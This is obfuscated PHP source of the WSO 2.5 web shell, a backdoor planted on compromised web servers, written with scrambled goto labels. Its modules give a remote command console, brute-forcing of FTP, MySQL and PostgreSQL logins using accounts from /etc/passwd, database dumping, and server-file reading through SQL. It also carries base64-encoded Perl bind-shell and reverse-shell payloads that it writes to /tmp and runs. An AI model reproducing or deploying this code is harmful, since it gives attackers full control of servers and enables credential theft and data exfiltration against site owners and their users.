echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
goto ClNOj;
ClNOj:
ob_start();
goto Z0UYj;
WpKFt:
$tmp = preg_replace(
[
"!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU",
"!td, th {(.*)}!msiU",
"!<img[^>]+>!msiU",
],
[
"",
".e, .v, .h, .h th {$1}",
"",
],
$tmp
);
goto AiOL8;
Z0UYj:
phpinfo();
goto pDREm;
pDREm:
$tmp = ob_get_clean();
goto WpKFt;
AiOL8:
echo str_replace("<h1", "<h2", $tmp) .
"</div><br>";
goto xiXKW;
xiXKW:
}
goto Sz7n2;
bE4Om:
echo " <input type=checkbox name=ajax value=1 " .
($_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX</form><pre id=PhpOutput style="" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px;" class=ml1>";
goto oWPfu;
dfcYP:
}
goto N84uU;
jB3VR:
$default_charset = "Windows-1251";
goto fj9OS;
rTVjF:
function actionLogout()
{
setcookie(
md5($_SERVER["HTTP_HOST"]),
"",
time() - 3600
);
die("bye!");
}
goto i6mTz;
DbGtY:
function actionBruteforce()
{
goto uMF9i;
hSv50:
if (isset($_POST["proto"])) {
goto jX4Q5;
UnBlf:
if ($_POST["type"] == 1) {
$temp = @file("/etc/passwd");
if (is_array($temp)) {
foreach ($temp as $line) {
goto vXxXO;
zFefs:
if (@$_POST["reverse"]) {
goto S2jvF;
oahSQ:
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
goto rxcry;
S2jvF:
$tmp = "";
goto oahSQ;
rxcry:
++$attempts;
goto TfDj5;
TfDj5:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$tmp
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($tmp);
}
goto lNTnA;
lNTnA:
}
goto i039d;
b2CQw:
++$attempts;
goto i1_FI;
i1_FI:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$line[0]
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($line[0]) .
"<br>";
}
goto zFefs;
vXxXO:
$line = explode(":", $line);
goto b2CQw;
i039d:
}
}
} elseif ($_POST["type"] == 2) {
$temp = @file($_POST["dict"]);
if (is_array($temp)) {
foreach ($temp as $line) {
goto kf0wF;
NI_R6:
if (
wsoBruteForce(
$server[0],
@$server[1],
$_POST["login"],
$line
)
) {
$success++;
echo "<b>" .
htmlspecialchars($_POST["login"]) .
"</b>:" .
htmlspecialchars($line) .
"<br>";
}
goto JCePy;
kf0wF:
$line = trim($line);
goto byC2k;
byC2k:
++$attempts;
goto NI_R6;
JCePy:
}
}
}
goto VERJt;
jX4Q5:
echo "<h1>Results</h1><div class=content><span>Type:</span> " .
htmlspecialchars($_POST["proto"]) .
" <span>Server:</span> " .
htmlspecialchars($_POST["server"]) .
"<br>";
goto LBJl4;
VERJt:
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
goto U2KZG;
ObcWW:
$server = explode(":", $_POST["server"]);
goto UnBlf;
LBJl4:
if ($_POST["proto"] == "ftp") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto w1bnC;
MJhTf:
@ftp_close($fp);
goto efLYK;
efLYK:
return $res;
goto zU7bZ;
aqJAG:
$res = @ftp_login($fp, $login, $pass);
goto MJhTf;
w1bnC:
$fp = @ftp_connect($ip, $port ? $port : 21);
goto NYGOQ;
NYGOQ:
if (!$fp) {
return false;
}
goto aqJAG;
zU7bZ:
}
} elseif ($_POST["proto"] == "mysql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto nwkI1;
tqKjk:
@mysqli_close($res);
goto lNvU5;
nwkI1:
$res = @mysqli_connect(
$ip . ":" . $port ? $port : 3306,
$login,
$pass
);
goto tqKjk;
lNvU5:
return $res;
goto h_hcl;
h_hcl:
}
} elseif ($_POST["proto"] == "pgsql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto ucMyA;
DgnPW:
@pg_close($res);
goto qQMP_;
qQMP_:
return $res;
goto N73qn;
ucMyA:
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
goto szIUy;
szIUy:
$res = @pg_connect($str);
goto DgnPW;
N73qn:
}
}
goto px18Z;
px18Z:
$success = 0;
goto aKdd5;
aKdd5:
$attempts = 0;
goto ObcWW;
U2KZG:
}
goto NNTq8;
NNTq8:
echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" .
"<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" .
"<input type=hidden name=c value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"">" .
"<input type=hidden name=a value="" .
htmlspecialchars($_POST["a"]) .
"">" .
"<input type=hidden name=charset value="" .
htmlspecialchars($_POST["charset"]) .
"">" .
"<span>Server:port</span></td>" .
"<td><input type=text name=server value="127.0.0.1"></td></tr>" .
"<tr><td><span>Brute type</span></td>" .
"<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" .
"<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" .
"<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" .
"<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" .
"<td><input type=text name=login value="root"></td></tr>" .
"<tr><td><span>Dictionary</span></td>" .
"<td><input type=text name=dict value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"passwd.dic"></td></tr></table>" .
"</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>";
goto HIh7o;
uMF9i:
wsoHeader();
goto hSv50;
HIh7o:
echo "</div><br>";
goto wlwoF;
wlwoF:
wsoFooter();
goto p3uSI;
p3uSI:
}
goto wVO2a;
uf2tU:
$default_use_ajax = true;
goto jB3VR;
d62j5:
function wsoEx($in)
{
$out = shell_exec($in);
return $out;
}
goto yXkOt;
wVO2a:
function actionSql()
{
goto pXyEP;
WqMW0:
if (@$_POST["type"] == "pgsql") {
echo "selected";
}
goto bZFnU;
qgUXu:
echo "</div>";
goto G862b;
G862b:
wsoFooter();
goto gsteZ;
bZFnU:
echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" .
(empty($_POST["sql_host"])
? "localhost"
: htmlspecialchars($_POST["sql_host"])) .
""></td>\xd
<td><input type=text name=sql_login value="" .
(empty($_POST["sql_login"])
? "root"
: htmlspecialchars(
$_POST["sql_login"]
)) .
""></td>
\xa<td><input type=text name=sql_pass value="" .
(empty($_POST["sql_pass"])
? ""
: htmlspecialchars($_POST["sql_pass"])) .
""></td><td>";
goto dxViD;
dxViD:
$tmp =
"<input type=text name=sql_base value=''>";
goto L_VIT;
Auorx:
echo "</td>\xd\xa\x9 \x9 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa <td><input type=checkbox name=sql_count value='on'" .
(empty($_POST["sql_count"])
? ""
: " checked") .
"> count the number of rows</td>\xd\xa \x9</tr>\xd\xa\x9 </table>
\x9<script>\xd
s_db='" .
@addslashes($_POST["sql_base"]) .
"';\xd\xa function fs(f) {\xd\xa if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
if(f.p1) f.p1.value='';\xd
if(f.p2) f.p2.value='';\xd\xa if(f.p3) f.p3.value='';\xd\xa }
\xa }\xd
\x9 \x9function st(t,l) {
\xa\x9\x9 \x9d.sf.p1.value = 'select';\xd
\x9\x9 d.sf.p2.value = t;
\xa if(l && d.sf.p3) d.sf.p3.value = l;\xd
d.sf.submit();
}
\x9\x9function is() {\xd\xa \x9\x9 for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9 \x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9 }\xd\xa \x9</script>";
goto omuNC;
omuNC:
if (isset($db) && $db->link) {
goto wQooQ;
v7m0f:
if (!empty($_POST["sql_base"])) {
goto Rgzyg;
MvXdD:
if (
@$_POST["p1"] == "query" &&
!empty($_POST["p2"])
) {
$db->query(@$_POST["p2"]);
if ($db->res !== false) {
goto p5kAe;
FQZVM:
while ($item = $db->fetch()) {
if (!$title) {
goto UHBlV;
UHBlV:
echo "<tr>";
goto hcvnp;
krRoK:
$line = 2;
goto OQDWZ;
hcvnp:
foreach ($item as $key => $value) {
echo "<th>" .
$key .
"</th>";
}
goto gYEfe;
s133J:
$title = true;
goto vdCQU;
vdCQU:
echo "</tr><tr>";
goto krRoK;
gYEfe:
reset($item);
goto s133J;
OQDWZ:
}
echo "<tr class="l" .
$line .
"">";
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo "<td>" .
nl2br(htmlspecialchars($value)) .
"</td>";
}
}
echo "</tr>";
}
goto LonsA;
c36CC:
$line = 1;
goto FQZVM;
LonsA:
echo "</table>";
goto zCgso;
vhOW_:
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">";
goto c36CC;
p5kAe:
$title = false;
goto vhOW_;
zCgso:
} else {
echo "<div><b>Error:</b> " .
htmlspecialchars($db->error()) .
"</div>";
}
}
goto f63uD;
f63uD:
echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
goto l03yb;
Rgzyg:
$db->selectdb($_POST["sql_base"]);
goto QW0Ku;
uEPKu:
if (@$_POST["p1"] == "select") {
goto mAhBO;
IznKf:
if ($_POST["p3"] > 1) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] - 1) .
")'>< Prev</a>";
}
goto ZoHo3;
l2Xna:
$pages = ceil($num["n"] / 30);
goto ZYT4s;
mAhBO:
$_POST["p1"] = "query";
goto e_ZJ4;
ZYT4s:
echo "<script>d.sf.onsubmit=function(){st("" .
$_POST["p2"] .
"", d.sf.p3.value)}</script><span>" .
$_POST["p2"] .
"</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" .
(int) $_POST["p3"] .
">";
goto uoZpe;
Es7M3:
$num = $db->fetch();
goto l2Xna;
uoZpe:
echo " of {$pages}";
goto IznKf;
rczWG:
$_POST["p3"]--;
goto bhg9h;
e_ZJ4:
$_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1;
goto Lo_J9;
nEjUO:
echo "<br><br>";
goto IQ9di;
bhg9h:
if ($_POST["type"] == "pgsql") {
$_POST["p2"] =
"SELECT * FROM " .
$_POST["p2"] .
" LIMIT 30 OFFSET " .
$_POST["p3"] * 30;
} else {
$_POST["p2"] =
"SELECT * FROM `" .
$_POST["p2"] .
"` LIMIT " .
$_POST["p3"] * 30 .
",30";
}
goto nEjUO;
Lo_J9:
$db->query(
"SELECT COUNT(*) as n FROM " .
$_POST["p2"]
);
goto Es7M3;
ZoHo3:
if ($_POST["p3"] < $pages) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] + 1) .
")'>Next ></a>";
}
goto rczWG;
IQ9di:
}
goto MvXdD;
EHE8j:
echo "</textarea><br/><input type=submit value='Execute'>";
goto epF3V;
bDaxO:
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST["sql_count"])) {
$n = $db->fetch(
$db->query(
"SELECT COUNT(*) as n FROM " .
$value .
""
)
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick="st('" .
$value .
"',1)">" .
$value .
"</a>" .
(empty($_POST["sql_count"])
? " "
: " <small>({$n["n"]})</small>") .
"</nobr><br>";
}
goto M5p5r;
l03yb:
if (
!empty($_POST["p2"]) &&
$_POST["p1"] != "loadfile"
) {
echo htmlspecialchars($_POST["p2"]);
}
goto EHE8j;
M5p5r:
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
goto uEPKu;
QW0Ku:
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
goto ss2k2;
epF3V:
echo "</td></tr>";
goto DdhHe;
ss2k2:
$tbls_res = $db->listTables();
goto bDaxO;
DdhHe:
}
goto E6Jlf;
E6Jlf:
echo "</table></form><br/>";
goto eqSj_;
HfqGV:
if (@$_POST["p1"] == "loadfile") {
$file = $db->loadFile($_POST["p2"]);
echo "<br/><pre class=ml1>" .
htmlspecialchars($file["file"]) .
"</pre>";
}
goto OSIXi;
eqSj_:
if ($_POST["type"] == "mysql") {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
}
goto HfqGV;
wQooQ:
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
goto v7m0f;
OSIXi:
} else {
echo htmlspecialchars($db->error());
}
goto qgUXu;
eZaK7:
echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa<td><select name='type'><option value='mysql' ";
goto XNXvh;
L_VIT:
if (isset($_POST["sql_host"])) {
if (
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
)
) {
goto zzoGT;
zzoGT:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto CgrPi;
hq4SA:
echo "</select>";
goto pJJmI;
CgrPi:
$db->listDbs();
goto KKbSG;
MV0Hw:
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo "<option value="" .
$value .
"" " .
($value == $_POST["sql_base"]
? "selected"
: "") .
">" .
$value .
"</option>";
}
goto hq4SA;
KKbSG:
echo "<select name=sql_base><option value=''></option>";
goto MV0Hw;
pJJmI:
} else {
echo $tmp;
}
} else {
echo $tmp;
}
goto Auorx;
pXyEP:
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case "mysql":
if (
$this->link = @mysqli_connect(
$host,
$user,
$pass,
$dbname
)
) {
return true;
}
break;
case "pgsql":
goto urMgZ;
NmhxL:
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}"
)
) {
return true;
}
goto q24c2;
q24c2:
break;
goto pMERe;
urMgZ:
$host = explode(":", $host);
goto dzuNv;
dzuNv:
if (!$host[1]) {
$host[1] = 5432;
}
goto NmhxL;
pMERe:
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "mysql":
if (@mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "mysql":
return $this->res = @mysqli_query($this->link, $str);
break;
case "pgsql":
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
goto ndkAm;
Ccrqd:
return false;
goto kFQe3;
ndkAm:
$res = func_num_args() ? func_get_arg(0) : $this->res;
goto uBsjP;
uBsjP:
switch ($this->type) {
case "mysql":
return @mysqli_fetch_assoc($res);
break;
case "pgsql":
return @pg_fetch_assoc($res);
break;
}
goto Ccrqd;
kFQe3:
}
function listDbs()
{
switch ($this->type) {
case "mysql":
return $this->query(
"SHOW databases"
);
break;
case "pgsql":
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mysql":
return $this->res = $this->query(
"SHOW TABLES"
);
break;
case "pgsql":
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "mysql":
return @mysqli_error();
break;
case "pgsql":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case "mysql":
if (
function_exists(
"mysql,_set_charset"
)
) {
return @mysqli_set_charset($str, $this->link);
} else {
$this->query(
"SET CHARSET " .
$str
);
}
break;
case "pgsql":
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case "mysql":
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case "pgsql":
goto hIi1_;
hIi1_:
$this->query(
"CREATE TABLE wso2(file text);COPY wso2 FROM '" .
addslashes($str) .
"';select file from wso2;"
);
goto Vq5gq;
RFQO1:
return ["file" => implode("
", $r)];
goto Xccn3;
Vq5gq:
$r = [];
goto B2PD8;
B2PD8:
while ($i = $this->fetch()) {
$r[] = $i["file"];
}
goto ytmal;
ytmal:
$this->query(
"drop table wso2"
);
goto RFQO1;
Xccn3:
break;
goto hza_Y;
hza_Y:
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case "mysql":
goto A8Rtf;
XOdpv:
$i = 0;
goto nXX1H;
dgmAw:
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";\xa
";
}
}
goto xuWj3;
nXX1H:
$head = true;
goto rdh_q;
vLJ0E:
$sql = $create[1] . ";\xa";
goto GZCGH;
e85gZ:
$this->query(
"SELECT * FROM `" .
$table .
"`"
);
goto XOdpv;
A8Rtf:
$res = $this->query(
"SHOW CREATE TABLE `" .
$table .
"`"
);
goto WbvCG;
rdh_q:
while ($item = $this->fetch()) {
$sql = "";
if ($i % 1000 == 0) {
$head = true;
$sql = ";\xa\xa";
}
$columns = [];
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "NULL";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] =
"'" .
@mysqli_real_escape_string($v) .
"'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql .=
"INSERT INTO `" .
$table .
"` (" .
implode(", ", $columns) .
") VALUES
(" .
implode(", ", $item) .
")";
$head = false;
} else {
$sql .=
"\xa ,(" .
implode(", ", $item) .
")";
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
goto dgmAw;
xuWj3:
break;
goto I2Pib;
WbvCG:
$create = mysqli_fetch_array($res);
goto vLJ0E;
GZCGH:
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
goto e85gZ;
I2Pib:
case "pgsql":
goto yK1Fh;
q4AGJ:
break;
goto M_aLo;
YU12f:
while ($item = $this->fetch()) {
$columns = [];
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
"INSERT INTO " .
$table .
" (" .
implode(", ", $columns) .
") VALUES (" .
implode(", ", $item) .
");" .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
goto q4AGJ;
yK1Fh:
$this->query(
"SELECT * FROM " .
$table
);
goto YU12f;
M_aLo:
}
return false;
}
}
goto S2jsy;
nON0D:
wsoHeader();
goto eZaK7;
S2jsy:
$db = new DbClass($_POST["type"]);
goto b5FFe;
xAAjI:
echo ">MySql</option><option value='pgsql' ";
goto WqMW0;
b5FFe:
if (@$_POST["p2"] == "download") {
goto q3uCo;
dKSpy:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto SW_1d;
SW_1d:
if (empty($_POST["file"])) {
goto UlEph;
NKAxm:
foreach ($_POST["tbl"] as $v) {
$db->dump($v);
}
goto gTeuJ;
UlEph:
ob_start("ob_gzhandler", 4096);
goto wxi0r;
wxi0r:
header(
"Content-Disposition: attachment; filename=dump.sql"
);
goto JFnky;
gTeuJ:
exit();
goto o3LDH;
JFnky:
header(
"Content-Type: text/plain"
);
goto NKAxm;
o3LDH:
} elseif ($fp = @fopen($_POST["file"], "w")) {
goto HVjKn;
sI6XB:
fclose($fp);
goto JcIQa;
JcIQa:
unset($_POST["p2"]);
goto eJ6NS;
HVjKn:
foreach ($_POST["tbl"] as $v) {
$db->dump($v, $fp);
}
goto sI6XB;
eJ6NS:
} else {
die(
"<script>alert("Error! Can't open file");window.history.back(-1)</script>"
);
}
goto V4cuJ;
q3uCo:
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
);
goto G1BTq;
G1BTq:
$db->selectdb($_POST["sql_base"]);
goto dKSpy;
V4cuJ:
}
goto nON0D;
XNXvh:
if (@$_POST["type"] == "mysql") {
echo "selected";
}
goto xAAjI;
gsteZ:
}
goto BTyYB;
M9YJl:
$_POST = WSOstripslashes($_POST);
goto ocXfq;
BTyYB:
function actionNetwork()
{
goto ZoVmx;
unkZP:
$bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
goto PvgFx;
y9LP4:
if (isset($_POST["p1"])) {
goto oL5si;
oL5si:
function cf($f, $t)
{
($w = @fopen($f, "w")) or
@function_exists(
"file_put_contents"
);
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
goto O2j7_;
O2j7_:
if ($_POST["p1"] == "bpp") {
goto OF3WF;
SvfsQ:
unlink("/tmp/bp.pl");
goto zB2bw;
l42lD:
sleep(1);
goto YdT1I;
YdT1I:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bp.pl"
) .
"</pre>";
goto SvfsQ;
P3N6B:
$out = wsoEx(
"perl /tmp/bp.pl " .
$_POST["p2"] .
" 1>/dev/null 2>&1 &"
);
goto l42lD;
OF3WF:
cf("/tmp/bp.pl", $bind_port_p);
goto P3N6B;
zB2bw:
}
goto mmghY;
mmghY:
if ($_POST["p1"] == "bcp") {
goto KdsjF;
EYep1:
unlink("/tmp/bc.pl");
goto vnHPj;
cueL2:
sleep(1);
goto rbk8c;
rbk8c:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bc.pl"
) .
"</pre>";
goto EYep1;
KdsjF:
cf("/tmp/bc.pl", $back_connect_p);
goto JIcLb;
JIcLb:
$out = wsoEx(
"perl /tmp/bc.pl " .
$_POST["p2"] .
" " .
$_POST["p3"] .
" 1>/dev/null 2>&1 &"
);
goto cueL2;
vnHPj:
}
goto HmOsb;
HmOsb:
}
goto JZOTa;
QtVUX:
wsoFooter();
goto r_ZsG;
ZoVmx:
wsoHeader();
goto ui6gf;
PvgFx:
echo "<h1>Network tools</h1><div class=content>\xd
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" .
$_SERVER["REMOTE_ADDR"] .
"'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>";
goto y9LP4;
JZOTa:
echo "</div>";
goto QtVUX;
ui6gf:
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
goto unkZP;
r_ZsG:
}
goto B8b3D;
ABTpd:
@ini_set(
"max_execution_time",
0
);
goto V8rDW;
LNmAT:
$default_action = "FilesMan";
goto uf2tU;
hd5Oa:
@define("WSO_VERSION", "2.5");
goto XWpnO;
w2GF1:
function actionConsole()
{
goto rclMD;
fIAZm:
if (isset($_POST["ajax"])) {
goto b0kHG;
UVP1d:
exit();
goto FfbZi;
k7CDe:
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
goto X7NDa;
nIuhp:
if (
preg_match(
"!.*cd\s+([^;]+)$!",
$_POST["p1"],
$match
)
) {
if (@chdir($match[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "c_='" . $GLOBALS["cwd"] . "';";
}
}
goto VTnj_;
LPhSs:
$temp = @iconv(
$_POST["charset"],
"UTF-8",
addcslashes(
"\xa$ " .
$_POST["p1"] .
"\xa" .
wsoEx($_POST["p1"]),
"\xa\xd\x9\'\x0"
)
);
goto nIuhp;
y6Hrb:
echo "d.cf.cmd.value='';
";
goto LPhSs;
wcz4k:
ob_start();
goto y6Hrb;
VTnj_:
echo "d.cf.output.value+='" .
$temp .
"';";
goto k7CDe;
jyokt:
echo strlen($temp), "
", $temp;
goto UVP1d;
b0kHG:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto wcz4k;
X7NDa:
$temp = ob_get_clean();
goto jyokt;
FfbZi:
}
goto KpSEA;
RZ79V:
echo "</form></div><script>d.cf.cmd.focus();</script>";
goto SJHUc;
f8SjV:
echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX <input type=checkbox name=show_errors value=1 " .
(!empty($_POST["p2"]) ||
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out"
]
? "checked"
: "") .
"> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>";
goto IWzV6;
SJHUc:
wsoFooter();
goto APwh_;
nacH0:
echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>";
goto RZ79V;
qs3Ch:
echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>";
goto qrzII;
